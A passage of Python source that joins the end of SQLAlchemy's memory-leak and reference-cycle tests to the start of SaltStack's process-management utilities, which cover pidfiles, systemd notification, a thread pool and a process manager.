# are very much a part of what's in the cache.
self.engine = engines.testing_engine(
options={"use_reaper": False, "query_cache_size": 10}
)
class MemUsageTest(EnsureZeroed):
__tags__ = ("memory_intensive",)
__requires__ = ("cpython", "no_windows")
def test_type_compile(self):
from sqlalchemy.dialects.sqlite.base import dialect as SQLiteDialect
cast = sa.cast(column("x"), sa.Integer)
@profile_memory()
def go():
dialect = SQLiteDialect()
cast.compile(dialect=dialect)
go()
@testing.requires.cextensions
def test_DecimalResultProcessor_init(self):
@profile_memory()
def go():
to_decimal_processor_factory({}, 10)
go()
@testing.requires.cextensions
def test_DecimalResultProcessor_process(self):
@profile_memory()
def go():
to_decimal_processor_factory(decimal.Decimal, 10)(1.2)
go()
@testing.requires.cextensions
def test_cycles_in_row(self):
tup = result.result_tuple(["a", "b", "c"])
@profile_memory()
def go():
obj = {"foo": {}}
obj["foo"]["bar"] = obj
row = tup([1, 2, obj])
obj["foo"]["row"] = row
del row
go()
def test_ad_hoc_types(self):
"""test storage of bind processors, result processors
in dialect-wide registry."""
from sqlalchemy.dialects import mysql, postgresql, sqlite
from sqlalchemy import types
eng = engines.testing_engine()
for args in (
(types.Integer,),
(types.String,),
(types.PickleType,),
(types.Enum, "a", "b", "c"),
(sqlite.DATETIME,),
(postgresql.ENUM, "a", "b", "c"),
(types.Interval,),
(postgresql.INTERVAL,),
(mysql.VARCHAR,),
):
@profile_memory()
def go():
type_ = args[0](*args[1:])
bp = type_._cached_bind_processor(eng.dialect)
rp = type_._cached_result_processor(eng.dialect, 0)
bp, rp # strong reference
go()
assert not eng.dialect._type_memos
@testing.fails()
def test_fixture_failure(self):
class Foo:
pass
stuff = []
@profile_memory(maxtimes=20)
def go():
stuff.extend(Foo() for i in range(100))
go()
class MemUsageWBackendTest(fixtures.MappedTest, EnsureZeroed):
__tags__ = ("memory_intensive",)
__requires__ = "cpython", "memory_process_intensive", "no_asyncio"
__sparse_backend__ = True
# ensure a pure growing test trips the assertion
@testing.fails_if(lambda: True)
def test_fixture(self):
class Foo:
pass
x = []
@profile_memory(maxtimes=10)
def go():
x[-1:] = [Foo(), Foo(), Foo(), Foo(), Foo(), Foo()]
go()
def test_session(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
Column("col3", Integer, ForeignKey("mytable.col1")),
)
metadata.create_all(self.engine)
m1 = self.mapper_registry.map_imperatively(
A,
table1,
properties={
"bs": relationship(
B, cascade="all, delete", order_by=table2.c.col1
)
},
)
m2 = self.mapper_registry.map_imperatively(B, table2)
@profile_memory()
def go():
with Session(self.engine) as sess:
a1 = A(col2="a1")
a2 = A(col2="a2")
a3 = A(col2="a3")
a1.bs.append(B(col2="b1"))
a1.bs.append(B(col2="b2"))
a3.bs.append(B(col2="b3"))
for x in [a1, a2, a3]:
sess.add(x)
sess.commit()
alist = sess.query(A).order_by(A.col1).all()
eq_(
[
A(col2="a1", bs=[B(col2="b1"), B(col2="b2")]),
A(col2="a2", bs=[]),
A(col2="a3", bs=[B(col2="b3")]),
],
alist,
)
for a in alist:
sess.delete(a)
sess.commit()
go()
metadata.drop_all(self.engine)
del m1, m2
assert_no_mappers()
def test_sessionmaker(self):
@profile_memory()
def go():
sessmaker = sessionmaker(bind=self.engine)
sess = sessmaker()
r = sess.execute(select(1))
r.close()
sess.close()
del sess
del sessmaker
go()
@testing.emits_warning("Compiled statement cache for mapper.*")
@testing.emits_warning("Compiled statement cache for lazy loader.*")
@testing.crashes("sqlite", ":memory: connection not suitable here")
def test_orm_many_engines(self):
metadata = MetaData(self.engine)
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
Column("col3", Integer, ForeignKey("mytable.col1")),
)
metadata.create_all()
m1 = self.mapper_registry.map_imperatively(
A,
table1,
properties={
"bs": relationship(
B, cascade="all, delete", order_by=table2.c.col1
)
},
_compiled_cache_size=50,
)
m2 = self.mapper_registry.map_imperatively(
B, table2, _compiled_cache_size=50
)
@profile_memory()
def go():
engine = engines.testing_engine(
options={
"logging_name": "FOO",
"pool_logging_name": "BAR",
"use_reaper": False,
}
)
with Session(engine) as sess:
a1 = A(col2="a1")
a2 = A(col2="a2")
a3 = A(col2="a3")
a1.bs.append(B(col2="b1"))
a1.bs.append(B(col2="b2"))
a3.bs.append(B(col2="b3"))
for x in [a1, a2, a3]:
sess.add(x)
sess.commit()
alist = sess.query(A).order_by(A.col1).all()
eq_(
[
A(col2="a1", bs=[B(col2="b1"), B(col2="b2")]),
A(col2="a2", bs=[]),
A(col2="a3", bs=[B(col2="b3")]),
],
alist,
)
for a in alist:
sess.delete(a)
sess.commit()
engine.dispose()
go()
metadata.drop_all()
del m1, m2
assert_no_mappers()
@testing.emits_warning("Compiled statement cache for.*")
def test_many_updates(self):
metadata = MetaData()
wide_table = Table(
"t",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
*[Column("col%d" % i, Integer) for i in range(10)]
)
class Wide:
pass
self.mapper_registry.map_imperatively(
Wide, wide_table, _compiled_cache_size=10
)
metadata.create_all(self.engine)
with Session(self.engine) as session:
w1 = Wide()
session.add(w1)
session.commit()
del session
counter = [1]
@profile_memory()
def go():
with Session(self.engine) as session:
w1 = session.query(Wide).first()
x = counter[0]
dec = 10
while dec > 0:
# trying to count in binary here,
# works enough to trip the test case
if pow(2, dec) < x:
setattr(w1, "col%d" % dec, counter[0])
x -= pow(2, dec)
dec -= 1
session.commit()
counter[0] += 1
try:
go()
finally:
metadata.drop_all(self.engine)
@testing.requires.savepoints
def test_savepoints(self):
metadata = MetaData()
some_table = Table(
"t",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
)
class SomeClass:
pass
self.mapper_registry.map_imperatively(SomeClass, some_table)
metadata.create_all(self.engine)
with Session(self.engine) as session:
target_strings = (
session.connection().dialect.identifier_preparer._strings
)
@profile_memory(
assert_no_sessions=False,
get_num_objects=lambda: len(target_strings),
)
def go():
with Session(self.engine) as session, session.begin():
sc = SomeClass()
session.add(sc)
with session.begin_nested():
session.query(SomeClass).first()
try:
go()
finally:
metadata.drop_all(self.engine)
@testing.crashes("mysql+cymysql", "blocking")
def test_unicode_warnings(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", Unicode(30)),
)
metadata.create_all(self.engine)
i = [1]
# the times here is cranked way up so that we can see
# pysqlite clearing out its internal buffer and allow
# the test to pass
@testing.emits_warning()
@profile_memory()
def go():
# execute with a non-unicode object. a warning is emitted,
# this warning shouldn't clog up memory.
with self.engine.connect() as conn:
conn.execute(
table1.select().where(table1.c.col2 == "foo%d" % i[0])
)
i[0] += 1
try:
go()
finally:
metadata.drop_all(self.engine)
def test_warnings_util(self):
counter = itertools.count()
import warnings
warnings.filterwarnings("ignore", "memusage warning.*")
@profile_memory()
def go():
util.warn_limited(
"memusage warning, param1: %s, param2: %s",
(next(counter), next(counter)),
)
go()
def test_mapper_reset(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
Column("col3", Integer, ForeignKey("mytable.col1")),
)
@profile_memory()
def go():
self.mapper_registry.map_imperatively(
A,
table1,
properties={"bs": relationship(B, order_by=table2.c.col1)},
)
self.mapper_registry.map_imperatively(B, table2)
sess = Session(self.engine, autoflush=False)
a1 = A(col2="a1")
a2 = A(col2="a2")
a3 = A(col2="a3")
a1.bs.append(B(col2="b1"))
a1.bs.append(B(col2="b2"))
a3.bs.append(B(col2="b3"))
for x in [a1, a2, a3]:
sess.add(x)
sess.flush()
sess.expunge_all()
alist = sess.query(A).order_by(A.col1).all()
eq_(
[
A(col2="a1", bs=[B(col2="b1"), B(col2="b2")]),
A(col2="a2", bs=[]),
A(col2="a3", bs=[B(col2="b3")]),
],
alist,
)
for a in alist:
sess.delete(a)
sess.flush()
sess.close()
clear_mappers()
metadata.create_all(self.engine)
try:
go()
finally:
metadata.drop_all(self.engine)
assert_no_mappers()
def test_alias_pathing(self):
metadata = MetaData()
a = Table(
"a",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("bid", Integer, ForeignKey("b.id")),
Column("type", String(30)),
)
asub = Table(
"asub",
metadata,
Column("id", Integer, ForeignKey("a.id"), primary_key=True),
Column("data", String(30)),
)
b = Table(
"b",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
)
self.mapper_registry.map_imperatively(
A, a, polymorphic_identity="a", polymorphic_on=a.c.type
)
self.mapper_registry.map_imperatively(
ASub, asub, inherits=A, polymorphic_identity="asub"
)
self.mapper_registry.map_imperatively(
B, b, properties={"as_": relationship(A)}
)
metadata.create_all(self.engine)
sess = Session(self.engine)
a1 = ASub(data="a1")
a2 = ASub(data="a2")
a3 = ASub(data="a3")
b1 = B(as_=[a1, a2, a3])
sess.add(b1)
sess.commit()
del sess
# sqlite has a slow enough growth here
# that we have to run it more times to see the
# "dip" again
@profile_memory(maxtimes=120)
def go():
sess = Session(self.engine)
sess.query(B).options(subqueryload(B.as_.of_type(ASub))).all()
sess.close()
del sess
try:
go()
finally:
metadata.drop_all(self.engine)
clear_mappers()
def test_path_registry(self):
metadata = MetaData()
a = Table(
"a",
metadata,
Column("id", Integer, primary_key=True),
Column("foo", Integer),
Column("bar", Integer),
)
b = Table(
"b",
metadata,
Column("id", Integer, primary_key=True),
Column("a_id", ForeignKey("a.id")),
)
m1 = self.mapper_registry.map_imperatively(
A, a, properties={"bs": relationship(B)}
)
self.mapper_registry.map_imperatively(B, b)
@profile_memory()
def go():
ma = sa.inspect(aliased(A))
m1._path_registry[m1.attrs.bs][ma][m1.attrs.bar]
go()
clear_mappers()
def test_with_inheritance(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
ForeignKey("mytable.col1"),
primary_key=True,
test_needs_autoincrement=True,
),
Column("col3", String(30)),
)
@profile_memory()
def go():
class A(fixtures.ComparableEntity):
pass
class B(A):
pass
clear_mappers()
self.mapper_registry.map_imperatively(
A,
table1,
polymorphic_on=table1.c.col2,
polymorphic_identity="a",
)
self.mapper_registry.map_imperatively(
B, table2, inherits=A, polymorphic_identity="b"
)
sess = Session(self.engine, autoflush=False)
a1 = A()
a2 = A()
b1 = B(col3="b1")
b2 = B(col3="b2")
for x in [a1, a2, b1, b2]:
sess.add(x)
sess.flush()
sess.expunge_all()
alist = sess.query(A).order_by(A.col1).all()
eq_([A(), A(), B(col3="b1"), B(col3="b2")], alist)
for a in alist:
sess.delete(a)
sess.flush()
# don't need to clear_mappers()
del B
del A
metadata.create_all(self.engine)
try:
go()
finally:
metadata.drop_all(self.engine)
assert_no_mappers()
def test_with_manytomany(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table3 = Table(
"t1tot2",
metadata,
Column("t1", Integer, ForeignKey("mytable.col1")),
Column("t2", Integer, ForeignKey("mytable2.col1")),
)
@profile_memory()
def go():
class A(fixtures.ComparableEntity):
pass
class B(fixtures.ComparableEntity):
pass
self.mapper_registry.map_imperatively(
A,
table1,
properties={
"bs": relationship(
B, secondary=table3, backref="as", order_by=table3.c.t1
)
},
)
self.mapper_registry.map_imperatively(B, table2)
sess = Session(self.engine, autoflush=False)
a1 = A(col2="a1")
a2 = A(col2="a2")
b1 = B(col2="b1")
b2 = B(col2="b2")
a1.bs.append(b1)
a2.bs.append(b2)
for x in [a1, a2]:
sess.add(x)
sess.flush()
sess.expunge_all()
alist = sess.query(A).order_by(A.col1).all()
eq_([A(bs=[B(col2="b1")]), A(bs=[B(col2="b2")])], alist)
for a in alist:
sess.delete(a)
sess.flush()
# mappers necessarily find themselves in the compiled cache,
# so to allow them to be GC'ed clear out the cache
self.engine.clear_compiled_cache()
del B
del A
metadata.create_all(self.engine)
try:
go()
finally:
metadata.drop_all(self.engine)
assert_no_mappers()
def test_many_discarded_relationships(self):
"""a use case that really isn't supported, nonetheless we can
guard against memleaks here so why not"""
m1 = MetaData()
t1 = Table("t1", m1, Column("id", Integer, primary_key=True))
t2 = Table(
"t2",
m1,
Column("id", Integer, primary_key=True),
Column("t1id", ForeignKey("t1.id")),
)
class T1:
pass
t1_mapper = self.mapper_registry.map_imperatively(T1, t1)
@testing.emits_warning()
@profile_memory()
def go():
class T2:
pass
t2_mapper = self.mapper_registry.map_imperatively(T2, t2)
t1_mapper.add_property("bar", relationship(t2_mapper))
s1 = Session(testing.db)
# this causes the path_registry to be invoked
s1.query(t1_mapper)._compile_context()
go()
# fails on newer versions of pysqlite due to unusual memory behavior
# in pysqlite itself. background at:
# https://thread.gmane.org/gmane.comp.python.db.pysqlite.user/2290
@testing.crashes("mysql+cymysql", "blocking")
def test_join_cache_deprecated_coercion(self):
metadata = MetaData()
table1 = Table(
"table1",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
)
table2 = Table(
"table2",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
Column("t1id", Integer, ForeignKey("table1.id")),
)
class Foo:
pass
class Bar:
pass
self.mapper_registry.map_imperatively(
Foo,
table1,
properties={
"bars": relationship(
self.mapper_registry.map_imperatively(Bar, table2)
)
},
)
metadata.create_all(self.engine)
session = sessionmaker(self.engine)
@profile_memory()
def go():
s = table2.select()
sess = session()
with testing.expect_deprecated(
"Implicit coercion of SELECT and " "textual SELECT constructs"
):
sess.query(Foo).join(s, Foo.bars).all()
sess.rollback()
try:
go()
finally:
metadata.drop_all(self.engine)
@testing.crashes("mysql+cymysql", "blocking")
def test_join_cache(self):
metadata = MetaData()
table1 = Table(
"table1",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
)
table2 = Table(
"table2",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
Column("t1id", Integer, ForeignKey("table1.id")),
)
class Foo:
pass
class Bar:
pass
self.mapper_registry.map_imperatively(
Foo,
table1,
properties={
"bars": relationship(
self.mapper_registry.map_imperatively(Bar, table2)
)
},
)
metadata.create_all(self.engine)
session = sessionmaker(self.engine)
@profile_memory()
def go():
s = aliased(Bar, table2.select().subquery())
sess = session()
sess.query(Foo).join(s, Foo.bars).all()
sess.rollback()
try:
go()
finally:
metadata.drop_all(self.engine)
class CycleTest(_fixtures.FixtureTest):
__tags__ = ("memory_intensive",)
__requires__ = ("cpython", "no_windows")
run_setup_mappers = "once"
run_inserts = "once"
run_deletes = None
@classmethod
def setup_mappers(cls):
cls._setup_stock_mapping()
def test_query(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
return s.query(User).all()
go()
def test_session_execute_orm(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
stmt = select(User)
s.execute(stmt)
go()
def test_cache_key(self):
User, Address = self.classes("User", "Address")
configure_mappers()
@assert_cycles()
def go():
stmt = select(User)
stmt._generate_cache_key()
go()
def test_proxied_attribute(self):
from sqlalchemy.ext import hybrid
users = self.tables.users
class Foo:
@hybrid.hybrid_property
def user_name(self):
return self.name
self.mapper_registry.map_imperatively(Foo, users)
# unfortunately there's a lot of cycles with an aliased()
# for now, however calling upon clause_element does not seem
# to make it worse which is what this was looking to test
@assert_cycles(69)
def go():
a1 = aliased(Foo)
a1.user_name.__clause_element__()
go()
def test_raise_from(self):
@assert_cycles()
def go():
try:
try:
raise KeyError("foo")
except KeyError as ke:
util.raise_(Exception("oops"), from_=ke)
except Exception as err: # noqa
pass
go()
def test_query_alias(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
u1 = aliased(User)
@assert_cycles()
def go():
s.query(u1).all()
go()
def test_entity_path_w_aliased(self):
User, Address = self.classes("User", "Address")
configure_mappers()
@assert_cycles()
def go():
u1 = aliased(User)
inspect(u1)._path_registry[User.addresses.property]
go()
def test_orm_objects_from_query(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
def generate():
objects = s.query(User).filter(User.id == 7).all()
gc_collect()
return objects
@assert_cycles()
def go():
generate()
go()
def test_orm_objects_from_query_w_selectinload(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
def generate():
objects = s.query(User).options(selectinload(User.addresses)).all()
gc_collect()
return objects
@assert_cycles()
def go():
generate()
go()
def test_selectinload_option_unbound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
selectinload(User.addresses)
go()
def test_selectinload_option_bound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
Load(User).selectinload(User.addresses)
go()
def test_orm_path(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
inspect(User)._path_registry[User.addresses.property][
inspect(Address)
]
go()
def test_joinedload_option_unbound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
joinedload(User.addresses)
go()
def test_joinedload_option_bound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
l1 = Load(User).joinedload(User.addresses)
l1._generate_cache_key()
go()
def test_orm_objects_from_query_w_joinedload(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
def generate():
objects = s.query(User).options(joinedload(User.addresses)).all()
gc_collect()
return objects
@assert_cycles()
def go():
generate()
go()
def test_query_filtered(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
@assert_cycles()
def go():
return s.query(User).filter(User.id == 7).all()
go()
def test_query_joins(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
# cycles here are due to ClauseElement._cloned_set, others
# as of cache key
@assert_cycles(4)
def go():
s.query(User).join(User.addresses).all()
go()
def test_query_joinedload(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
def generate():
s.query(User).options(joinedload(User.addresses)).all()
# cycles here are due to ClauseElement._cloned_set and Load.context,
# others as of cache key. The orm.instances() function now calls
# dispose() on both the context and the compiled state to try
# to reduce these cycles.
@assert_cycles(18)
def go():
generate()
go()
def test_plain_join(self):
users, addresses = self.tables("users", "addresses")
@assert_cycles()
def go():
str(users.join(addresses).compile(testing.db))
go()
def test_plain_join_select(self):
users, addresses = self.tables("users", "addresses")
# cycles here are due to ClauseElement._cloned_set, others
# as of cache key
@assert_cycles(7)
def go():
s = select(users).select_from(users.join(addresses))
state = s._compile_state_factory(s, s.compile(testing.db))
state.froms
go()
def test_orm_join(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
str(orm_join(User, Address, User.addresses).compile(testing.db))
go()
def test_join_via_query_relationship(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
s.query(User).join(User.addresses)
go()
def test_join_via_query_to_entity(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
s.query(User).join(Address)
go()
def test_result_fetchone(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.connection(mapper=User).execute(stmt)
while True:
row = result.fetchone()
if row is None:
break
go()
def test_result_fetchall(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.execute(stmt)
rows = result.fetchall() # noqa
go()
def test_result_fetchmany(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.execute(stmt)
for partition in result.partitions(3):
pass
go()
def test_result_fetchmany_unique(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.execute(stmt)
for partition in result.unique().partitions(3):
pass
go()
def test_core_select_from_orm_query(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
# ORM query using future select for .statement is adding
# some ORMJoin cycles here during compilation. not worth trying to
# find it
@assert_cycles(4)
def go():
s.execute(stmt)
go()
def test_adapt_statement_replacement_traversal(self):
User, Address = self.classes("User", "Address")
statement = select(User).select_from(
orm_join(User, Address, User.addresses)
)
@assert_cycles()
def go():
replacement_traverse(statement, {}, lambda x: None)
go()
def test_adapt_statement_cloned_traversal(self):
User, Address = self.classes("User", "Address")
statement = select(User).select_from(
orm_join(User, Address, User.addresses)
)
@assert_cycles()
def go():
cloned_traverse(statement, {}, {})
go()
def test_column_adapter_lookup(self):
User, Address = self.classes("User", "Address")
u1 = aliased(User)
@assert_cycles()
def go():
adapter = sql_util.ColumnAdapter(inspect(u1).selectable)
adapter.columns[User.id]
go()
def test_orm_aliased(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
u1 = aliased(User)
inspect(u1)
go()
@testing.fails()
def test_the_counter(self):
@assert_cycles()
def go():
x = []
x.append(x)
go()
def test_weak_sequence(self):
class Foo:
pass
f = Foo()
@assert_cycles()
def go():
util.WeakSequence([f])
go()
@testing.provide_metadata
def test_optimized_get(self):
Base = declarative_base(metadata=self.metadata)
class Employee(Base):
__tablename__ = "employee"
id = Column(
Integer, primary_key=True, test_needs_autoincrement=True
)
type = Column(String(10))
__mapper_args__ = {"polymorphic_on": type}
class Engineer(Employee):
__tablename__ = " engineer"
id = Column(ForeignKey("employee.id"), primary_key=True)
engineer_name = Column(String(50))
__mapper_args__ = {"polymorphic_identity": "engineer"}
Base.metadata.create_all(testing.db)
s = Session(testing.db)
s.add(Engineer(engineer_name="wally"))
s.commit()
s.close()
@assert_cycles()
def go():
e1 = s.query(Employee).first()
e1.engineer_name
go()
def test_visit_binary_product(self):
a, b, q, e, f, j, r = [column(chr_) for chr_ in "abqefjr"]
from sqlalchemy import and_, func
from sqlalchemy.sql.util import visit_binary_product
expr = and_((a + b) == q + func.sum(e + f), j == r)
def visit(expr, left, right):
pass
@assert_cycles()
def go():
visit_binary_product(visit, expr)
go()
def test_session_transaction(self):
@assert_cycles()
def go():
s = Session(testing.db)
s.connection()
s.close()
go()
def test_session_commit_rollback(self):
# this is enabled by #5074
@assert_cycles()
def go():
s = Session(testing.db)
s.connection()
s.commit()
go()
@assert_cycles()
def go():
s = Session(testing.db)
s.connection()
s.rollback()
go()
def test_session_multi_transaction(self):
@assert_cycles()
def go():
s = Session(testing.db)
assert s._transaction is None
s.connection()
s.close()
assert s._transaction is None
s.connection()
assert s._transaction is not None
s.close()
go()
|
process.py
|
# -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import, with_statement
import copy
import os
import sys
import time
import errno
import types
import signal
import logging
import threading
import contextlib
import subprocess
import multiprocessing
import multiprocessing.util
# Import salt libs
import salt.defaults.exitcodes
import salt.utils
import salt.log.setup
import salt.defaults.exitcodes
from salt.log.mixins import NewStyleClassMixIn
# Import 3rd-party libs
import salt.ext.six as six
from salt.ext.six.moves import queue, range # pylint: disable=import-error,redefined-builtin
from tornado import gen
log = logging.getLogger(__name__)
# pylint: disable=import-error
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
def systemd_notify_call(action):
process = subprocess.Popen(['systemd-notify', action], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.communicate()
status = process.poll()
return status == 0
def notify_systemd():
'''
Notify systemd that this process has started
'''
try:
import systemd.daemon
except ImportError:
if salt.utils.which('systemd-notify') and systemd_notify_call('--booted'):
return systemd_notify_call('--ready')
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify('READY=1')
except SystemError:
# Daemon was not started by systemd
pass
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
log.debug(('Created pidfile: {0}').format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except IndexError:
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def check_pidfile(pidfile):
'''
Determine if a pidfile has been written out
'''
return os.path.isfile(pidfile)
def get_pidfile(pidfile):
'''
Return the pid from a pidfile as an integer
'''
with salt.utils.fopen(pidfile) as pdf:
pid = pdf.read()
return int(pid)
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if isinstance(pid, six.string_types):
pid = int(pid)
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool(object):
'''
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
Since there isn't much use for this class as of right now this implementation
Only supports daemonized threads and will *not* return results
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
'''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
except AttributeError:
# During shutdown, `queue` may not have an `Empty` atttribute. Thusly,
# we have to catch a possible exception from our exception handler in
# order to avoid an unclean shutdown. Le sigh.
continue
try:
log.debug('ThreadPool executing func: {0} with args:{1}'
' kwargs{2}'.format(func, args, kwargs))
func(*args, **kwargs)
except Exception as err:
log.debug(err, exc_info=True)
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
self._restart_processes = True
def add_process(self, tgt, args=None, kwargs=None, name=None):
'''
Create a processes and args + kwargs
This will deterimine if it is a Process class, otherwise it assumes
it is a function
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if salt.utils.is_windows():
# Need to ensure that 'log_queue' is correctly transfered to
# processes that inherit from 'MultiprocessingProcess'.
if type(MultiprocessingProcess) is type(tgt) and (
issubclass(tgt, MultiprocessingProcess)):
need_log_queue = True
else:
need_log_queue = False
if need_log_queue and 'log_queue' not in kwargs:
if hasattr(self, 'log_queue'):
kwargs['log_queue'] = self.log_queue
else:
kwargs['log_queue'] = (
salt.log.setup.get_multiprocessing_logging_queue())
# create a nicer name for the debug log
if name is None:
if isinstance(tgt, types.FunctionType):
name = '{0}.{1}'.format(
tgt.__module__,
tgt.__name__,
)
else:
name = '{0}{1}.{2}'.format(
tgt.__module__,
'.{0}'.format(tgt.__class__) if str(tgt.__class__) != "<type 'type'>" else '',
tgt.__name__,
)
